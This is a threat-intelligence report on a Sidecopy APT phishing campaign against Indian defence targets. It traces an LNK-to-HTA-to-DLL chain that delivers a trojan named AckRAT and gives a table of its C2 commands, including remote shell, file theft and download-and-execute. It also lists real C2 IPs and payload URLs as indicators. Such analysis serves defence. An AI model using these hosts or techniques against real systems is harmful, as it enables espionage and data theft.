Group Background
In September 2020, Quick Heal revealed an espionage operation targeting Indian Defense Forces and armed forces personnel, which was named Operation Sidecopy. The operation began in early 2019 and was named Operation Sidecopy due to the attackers mainly using Sidewinder APT group's TTPs for the attack.
In July 2021, Cisco Talos researchers identified the attackers behind this operation as a separate group and named it the Sidecopy APT group. The report revealed that this group used various attack tools, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT, and several C# plugins [1].
Sidecopy mainly distributes malware through ZIP compressed files containing LNK or DOC files as email attachments. The group mainly targets Indian Defense Forces and armed forces personnel, conducts intelligence collection operations against the Indian government and military personnel, and uses spear-phishing techniques to lure victims in India's defense and other government organizations or infect USB devices to attack government and military organizations in India and Afghanistan.
Event Summary
Following the tracking report of Sidecopy released in March, QiAnXin Threat Intelligence Center's RedDrip team captured another batch of Sidecopy attack samples targeting India during their daily threat intelligence hunting. In this attack campaign, the attackers mainly used a Saudi Arabian delegation visiting India as bait, disguised the downloader as a shortcut file, and sent it to victims via phishing emails. When the victim decompressed and executed the bait file, the program would download the data file from the remote server to the local machine and decrypt and execute it, ultimately loading the remote control software AckRAT.
In this attack campaign, Sidecopy's infection chain remained relatively consistent with previous attack activities, using malicious LNK files as entry points, followed by a complex infection chain involving multiple layers of file nesting to deliver the final payload. The final payload is suspected to be a new trojan developed by the Sidecopy group, which continuously sends the 'ACK' character during communication with C2, so we temporarily named it AckRAT.
Detailed Analysis
(1)Basic Information
During the threat hunting process, we did not capture the initial attack payload. Based on Sidecopy's typical attack techniques and the compressed file, we speculate that the initial attack payload should be a spear-phishing email with a compressed file attachment. The victim is lured to click and open the compressed file and then click on the lnk file inside.
| - | - |
|---|---|
| File Name | Saudi_Delegation.zip |
| MD5 | 6D724445E65B6407F26A5B0251FDD1E4 |
| Size | 3989544 bytes |
| Type | Zip |
After decompression, there are hidden folders named "Adobe" and a bait lnk file. The lnk file name is translated as "Saudi delegation".
Analyzing the bait lnk file, it uses the system's mshta.exe to access the subsequent payload that is mounted on the official website of Ssynergy Company in India.
Ssynergy Company is a large Indian manufacturer and exporter that provides various raw materials for cosmetics, composite materials, nutritional supplements, etc. It has a history of more than 75 years in the field of materials science. Its official website introduction claims that its customers include the Indian Prime Minister's Office and the Indian Institute of Technology.
We speculate that the Sidecopy group uploaded the payload to the Ssynergy Company official website through vulnerabilities and relayed the subsequent payload through a normal website address to bypass some security software monitoring. The file mounted on its page is delegation.hta, which is Sidecopy's usual JS script.
(2)preBotHta.dll
The main function of delegation.hta is to load preBotHta.dll into memory and call the PinkAgain function in preBotHta.dll.
The PinkAgain function first decrypts the nested data in the JS code and releases the bait PDF file to confuse the victim.
The released bait content is related to the lnk file name and is about the visit of the Saudi Arabian medical delegation to India to discuss medical issues with Indian military medical officers. The time in the upper right corner is March 17, 2023, indicating that the attack activity occurred recently.
Then, the subsequent execution method is determined based on the anti-virus software information passed through the JS script. However, in the current version, regardless of the type of anti-virus software, the same branch is taken. After decrypting the passed data, an executable file is released and executed.
(3)AckRAT
The released Trex.exe is disguised as software from Trex Corporation.
First, it collects information about the victim, including the computer name, username, antivirus software information, and system version.
Then, it sends the collected information to C2: 209.126.81.42, port 444, and parses the data returned by C2. The remote control process is only initiated when C2 returns data greater than one byte; otherwise, it continues to loop. In the actual debugging process, C2 always returns a single character 'y'.
Given that this RAT frequently sends the 'ack' string to request data from C2, we temporarily named it AckRAT. The corresponding functions of its commands are as follows:
| - | - | - |
|---|---|---|
| Command 1 | Command 2 | Function |
| Not no | b | Get the names of all files and folders under a specified path and send them to a designated network receiver. |
| no | d | After sending three 'ack' to C2, receive the data returned by C2, write it to a file but do not execute it. |
| no | e | The same as the 'd' command, but after sending three 'ack' to C2, receive the data returned by C2, write it to a file and execute it. |
| no | f | Delete a specified file or folder. |
| no | g | Remote shell. |
| no | c | Upload files to a designated path on C2. |
| no | a | Send disk information. |
| no | z | End process and exit. |
| no | h | Take a screenshot and send it. |
| no | i | End process and exit. |
Attribution
The attack process of AckRAT is basically consistent with the analysis of recent attacks by the Sidecopy group using Indian Ministry of Defence-related documents that I disclosed in my previous article [2] last month.
Moreover, the lnk files were all generated from the same developer environment.
Based on this, we were able to track down the DetaRAT used in the Sidecopy attack in March, with C2 being 185.136.161.129, port 4987, and its C2 command has not changed compared to older versions.
Additionally, Sidecopy maintains its style of enriching its RAT code by obtaining code from the Internet, and has added the function of capturing browser passwords in the new DetaRAT based on open source projects.
Conclusion
The recent attack organized by Sidecopy is a continuation of the attacks that occurred in March. The attack components included AllaKoreRAT, ActionRAT, DetaRAT, and C++ Trojans. The attack methods and weapon codes were relatively simple, and they were proficient in using open-source codes and tools available online. We have previously disclosed their attacks on multiple platforms such as Linux and MacOS [3]. The QiAnXin Threat Intelligence Center will conduct long-term tracking and follow-up on them, timely detect security threats, and respond to them quickly.
APT group attacks have always been a huge cybersecurity threat to countries and enterprises. They are usually carefully planned by certain individuals for commercial or political motives, targeting specific organizations or countries, and will maintain a high level of concealment during long-term attack activities. Therefore, constant vigilance is necessary.
Protection Suggestions
The QiAnXin Threat Intelligence Center reminds users to be vigilant against phishing attacks, never to open links of unknown origin shared on social media, never to click on email attachments from unknown sources, never to run unknown files with exaggerated titles, and never to install apps from non-official channels. It is recommended to regularly back up important files and update and install patches.
If you need to run an app of unknown origin, you can first use the QiAnXin Threat Intelligence Center's file deep analysis platform (https://sandbox.ti.qianxin.com/sandbox/page) for identification. Currently, the platform supports the deep analysis of various file formats, including Windows and Android platforms.
At present, all QiAnXin's products based on the threat intelligence data from the QiAnXin Threat Intelligence Center, including the QiAnXin Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, can accurately detect such attacks.
IOC
MD5
6D724445E65B6407F26A5B0251FDD1E4
D663E977C079D338D47E937F7AFCFBB4
2C65DC705BA503261654AA40484A19E9
42A152594AF53012A3559BD7CDF99056
AC92A32AEE15421AB9E953B1836A691B
E62B5CC773A2240BBFA56B535076905F
C&C
209.126.81.42:444
185.136.161.129:4987
URL
https://ssynergy.in/wp-content/themes/twentytwentythree/assets/fonts/inter/delegation/
https://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso
https://halterarks.co.uk/img/gallery/misc/files/html5-k/
https://halterarks.co.uk/img/gallery/misc/files/jquery-k/
References
[1]. https://blog.talosintelligence.com/2021/07/Sidecopy.html
[2]. https://ti.qianxin.com/blog/articles/Analysis-of-Sidecopy-Group's-Recent-Attacks-Using-Indian-Ministry-of-Defense-Documents-as-Lures-CN/
[3]. https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/